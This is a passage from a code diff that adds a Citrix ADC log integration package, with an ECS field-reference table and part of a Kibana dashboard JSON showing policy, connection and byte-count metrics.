citrix_adc.log.type | | keyword | +| citrix_adc.log.unknown_content_type | | keyword | +| citrix_adc.log.url | | keyword | +| citrix_adc.log.url_length | | long | +| citrix_adc.log.user | | keyword | +| citrix_adc.log.useremail | | keyword | +| citrix_adc.log.username | | keyword | +| citrix_adc.log.valid_from | | date | +| citrix_adc.log.valid_to | | date | +| citrix_adc.log.value | | keyword | +| citrix_adc.log.violation_type | | keyword | +| citrix_adc.log.vserver.ip | | ip | +| citrix_adc.log.vserver.port | | long | +| citrix_adc.log.watch_id | | keyword | +| client.address | Some event client addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| client.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| client.as.organization.name | Organization name. | keyword | +| client.as.organization.name.text | Multi-field of `client.as.organization.name`. | match_only_text | +| client.domain | The domain name of the client system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| client.geo.city_name | City name. | keyword | +| client.geo.continent_name | Name of the continent. | keyword | +| client.geo.country_iso_code | Country ISO code. | keyword | +| client.geo.country_name | Country name. | keyword | +| client.geo.location | Longitude and latitude. | geo_point | +| client.geo.region_iso_code | Region ISO code. | keyword | +| client.geo.region_name | Region name. | keyword | +| client.ip | IP address of the client (IPv4 or IPv6). | ip | +| client.port | Port of the client. 
| long | +| client.user.name | Short name or login of the user. | keyword | +| client.user.name.text | Multi-field of `client.user.name`. | match_only_text | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. 
For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | event.created contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from @timestamp in that @timestamp typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, @timestamp should be used. | date | +| event.dataset | Event dataset | constant_keyword | +| event.duration | Duration of the event in nanoseconds. If event.start and event.end are known this value should be the difference between the end and start time. | long | +| event.end | event.end contains the date when the event ended or when the activity was last observed. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. 
| date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data coming in at a regular interval or not. | keyword | +| event.module | Event module | constant_keyword | +| event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.start | event.start contains the date when the event started or when the activity was first observed. | date | +| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. 
"-05:00"). | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| file.path.text | Multi-field of `file.path`. | match_only_text | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. 
| keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| http.request.id | A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. | keyword | +| http.request.method | HTTP request method. The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. | keyword | +| input.type | Input type. | keyword | +| labels | Custom key/value pairs. Can be used to add meta information to events. Should not contain nested objects. All values are stored as keyword. Example: `docker` and `k8s` labels. | object | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | +| log.level | Original log level of the log event. If the source of the event provides a log level or textual severity, this is the one that goes in `log.level`. If your source doesn't specify one, you may put your event transport's severity here (e.g. Syslog severity). Some examples are `warn`, `err`, `i`, `informational`. | keyword | +| log.offset | Offset of the entry in the log file. | long | +| log.source.address | Source address from which the log event was read / sent from. | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. 
For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| network.bytes | Total bytes transferred in both directions. If `source.bytes` and `destination.bytes` are known, `network.bytes` is their sum. | long | +| network.community_id | A hash of source and destination IPs and ports, as well as the protocol used in a communication. This is a tool-agnostic standard to identify flows. Learn more at https://github.com/corelight/community-id-spec. | keyword | +| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword | +| network.iana_number | IANA Protocol Number (https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml). Standardized list of protocols. This aligns well with NetFlow and sFlow related logs which use the IANA Protocol Number. | keyword | +| network.inner | Network.inner fields are added in addition to network.vlan fields to describe the innermost VLAN when q-in-q VLAN tagging is present. Allowed fields include vlan.id and vlan.name. Inner vlan fields are typically used when sending traffic with multiple 802.1q encapsulations to a network sensor (e.g. Zeek, Wireshark.) 
| group | +| network.inner.vlan.id | VLAN ID as reported by the observer. | keyword | +| network.inner.vlan.name | Optional VLAN name as reported by the observer. | keyword | +| network.protocol | In the OSI Model this would be the Application Layer protocol. For example, `http`, `dns`, or `ssh`. The field value must be normalized to lowercase for querying. | keyword | +| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword | +| network.type | In the OSI Model this would be the Network Layer. ipv4, ipv6, ipsec, pim, etc The field value must be normalized to lowercase for querying. | keyword | +| observer.egress.interface.name | Interface name as reported by the system. | keyword | +| observer.egress.zone | Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. | keyword | +| observer.hostname | Hostname of the observer. | keyword | +| observer.ingress.interface.name | Interface name as reported by the system. | keyword | +| observer.ingress.zone | Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. | keyword | +| observer.ip | IP addresses of the observer. | ip | +| observer.name | Custom name of the observer. This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. If no custom name is needed, the field can be left empty. | keyword | +| observer.product | The product name of the observer. | keyword | +| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. 
| keyword |
+| observer.vendor | Vendor name of the observer. | keyword |
+| observer.version | Observer version. | keyword |
+| process.name | Process name. Sometimes called program name or similar. | keyword |
+| process.name.text | Multi-field of `process.name`. | match_only_text |
+| process.pid | Process id. | long |
+| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword |
+| related.ip | All of the IPs seen on your event. | ip |
+| related.user | All the user names or other user identifiers seen on the event. | keyword |
+| server.address | Some event server addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword |
+| server.domain | The domain name of the server system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword |
+| server.ip | IP address of the server (IPv4 or IPv6). | ip |
+| server.port | Port of the server. | long |
+| server.user.name | Short name or login of the user. | keyword |
+| server.user.name.text | Multi-field of `server.user.name`. | match_only_text |
+| source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword |
+| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long |
+| source.as.organization.name | Organization name.
| keyword |
+| source.as.organization.name.text | Multi-field of `source.as.organization.name`. | match_only_text |
+| source.bytes | Bytes sent from the source to the destination. | long |
+| source.domain | The domain name of the source system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword |
+| source.geo.city_name | City name. | keyword |
+| source.geo.continent_name | Name of the continent. | keyword |
+| source.geo.country_iso_code | Country ISO code. | keyword |
+| source.geo.country_name | Country name. | keyword |
+| source.geo.location | Longitude and latitude. | geo_point |
+| source.geo.region_iso_code | Region ISO code. | keyword |
+| source.geo.region_name | Region name. | keyword |
+| source.ip | IP address of the source (IPv4 or IPv6). | ip |
+| source.nat.ip | Translated ip of source based NAT sessions (e.g. internal client to internet) Typically connections traversing load balancers, firewalls, or routers. | ip |
+| source.nat.port | Translated port of source based NAT sessions. (e.g. internal client to internet) Typically used with load balancers, firewalls, or routers. | long |
+| source.port | Port of the source. | long |
+| source.user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword |
+| source.user.group.name | Name of the group. | keyword |
+| source.user.name | Short name or login of the user. | keyword |
+| source.user.name.text | Multi-field of `source.user.name`. | match_only_text |
+| tags | List of keywords used to tag each event. | keyword |
+| url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field.
If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword |
+| url.extension | The field contains the file extension from the original request url, excluding the leading dot. The file extension is only set if it exists, as not every url has a file extension. The leading period must not be included. For example, the value must be "png", not ".png". Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword |
+| url.fragment | Portion of the url after the `#`, such as "top". The `#` is not part of the fragment. | keyword |
+| url.full | If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. | wildcard |
+| url.full.text | Multi-field of `url.full`. | match_only_text |
+| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard |
+| url.original.text | Multi-field of `url.original`. | match_only_text |
+| url.password | Password of the request. | keyword |
+| url.path | Path of the request, such as "/search". | wildcard |
+| url.port | Port of the request, such as 443. | long |
+| url.query | The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. | keyword |
+| url.registered_domain | The highest registered url domain, stripped of the subdomain.
For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword |
+| url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword |
+| url.subdomain | The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword |
+| url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword |
+| url.username | Username of the request. | keyword |
+| user.email | User email address. | keyword |
+| user.name | Short name or login of the user. | keyword |
+| user.name.text | Multi-field of `user.name`. | match_only_text |
diff --git a/packages/citrix_adc/img/citrix_adc-log-dashboard.png b/packages/citrix_adc/img/citrix_adc-log-dashboard.png
new file mode 100644
index 00000000000..aced8e5f588
Binary files /dev/null and b/packages/citrix_adc/img/citrix_adc-log-dashboard.png differ
diff --git a/packages/citrix_adc/kibana/dashboard/citrix_adc-95709fd0-e130-11ee-adb0-b71252739438.json b/packages/citrix_adc/kibana/dashboard/citrix_adc-95709fd0-e130-11ee-adb0-b71252739438.json
new file mode 100644
index 00000000000..1a2b320dcd7
--- /dev/null
+++ b/packages/citrix_adc/kibana/dashboard/citrix_adc-95709fd0-e130-11ee-adb0-b71252739438.json
@@ -0,0 +1,3613 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"6ab2c79f-26b6-40d8-b815-11f62306ce5b\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"6ab2c79f-26b6-40d8-b815-11f62306ce5b\",\"fieldName\":\"citrix.priority\",\"title\":\"Priority\",\"enhancements\":{}}},\"7849d87b-cbf3-47c3-b808-135dbf36be2b\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7849d87b-cbf3-47c3-b808-135dbf36be2b\",\"fieldName\":\"citrix.device_event_class_id\",\"title\":\"Event Class\",\"enhancements\":{}}},\"6351864e-e4f7-4e0e-87be-cfbadfc617e5\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"6351864e-e4f7-4e0e-87be-cfbadfc617e5\",\"fieldName\":\"citrix.name\",\"title\":\"Event Name\",\"enhancements\":{}}},\"65ecce3a-f292-4786-bbe8-5d9a0964a5ce\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"65ecce3a-f292-4786-bbe8-5d9a0964a5ce\",\"fieldName\":\"citrix.facility\",\"title\":\"Facitity\",\"enhancements\":{},\"selectedOptions\":[]}}}" + }, + "description": "Overview of the Logs collected by the Citrix ADC.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + 
"id": "", + "params": { + "fontSize": 12, + "markdown": "#### Citrix ADC\n\n#### Overview\nThis dashboard provides a streamlined view of your network's health and security using Log Data-stream. It provides metrics for total allowed and denied policies, TCP connections and UDP flows, and source and destination bytes. It also provides overview of events on the basis of network protocol, network transport, priority, action, class, name, and top 10 of Source IP, Destination IP, Client IP, Server IP, Source countries, Client countries, Request domain, Request path and Request query. It gives information of severity and events over time.\n\n[**Integration Page**](/app/integrations/detail/citrix_adc/overview)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 33, + "i": "28c460d2-8a65-48ce-8387-37708452304c", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "28c460d2-8a65-48ce-8387-37708452304c", + "title": "Table of Contents", + "type": "visualization", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a4952cfd-1931-44ff-a055-45881e87fbf9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Policies Denied", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "citrix_adc.log.total_policies_denied" + } + }, + "incompleteColumns": {} + } + } + 
}, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a4952cfd-1931-44ff-a055-45881e87fbf9", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "f7acb623-11e3-4403-9b9b-fc30630b7449", + "w": 12, + "x": 12, + "y": 0 + }, + "panelIndex": "f7acb623-11e3-4403-9b9b-fc30630b7449", + "title": "Total Policies Denied [Logs Citrix ADC] ", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "45a5b385-2216-447e-b0cd-f480a8a4c212", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total UDP Flows", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "citrix_adc.log.total_udp_flows" + } 
+ }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "45a5b385-2216-447e-b0cd-f480a8a4c212", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "5e9be0e0-4605-4e82-89e2-d18942be9929", + "w": 12, + "x": 24, + "y": 0 + }, + "panelIndex": "5e9be0e0-4605-4e82-89e2-d18942be9929", + "title": "Total UDP Flows [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57891f44-e3cc-4c13-a561-98af9b658060", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Source Bytes", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": 
"source.bytes" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "57891f44-e3cc-4c13-a561-98af9b658060", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "ed9aa7e1-608b-4b65-8f0f-b64432678cd2", + "w": 12, + "x": 36, + "y": 0 + }, + "panelIndex": "ed9aa7e1-608b-4b65-8f0f-b64432678cd2", + "title": "Source Bytes [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a67fd70d-3451-43ad-8947-9549dde00283", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Policies Allowed", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": 
"ratio", + "sourceField": "citrix_adc.log.total_policies_allowed" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a67fd70d-3451-43ad-8947-9549dde00283", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "2dfcb670-693f-4f10-9717-e4056e66a4f1", + "w": 12, + "x": 12, + "y": 9 + }, + "panelIndex": "2dfcb670-693f-4f10-9717-e4056e66a4f1", + "title": "Total Policies Allowed [Logs Citrix ADC] ", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "90bfe744-969a-453e-af29-e3ef2dd9cc25", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total TCP Connections", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", 
+ "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "citrix_adc.log.total_tcp_connections" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "90bfe744-969a-453e-af29-e3ef2dd9cc25", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "f9e0bb83-7c80-4abb-8a68-5be15c8f096b", + "w": 12, + "x": 24, + "y": 9 + }, + "panelIndex": "f9e0bb83-7c80-4abb-8a68-5be15c8f096b", + "title": "Total TCP Connections [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fe0867c1-6ca2-4dac-88ce-6f1b36a9d1bf", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Destination Bytes", + "operationType": "unique_count", + "params": 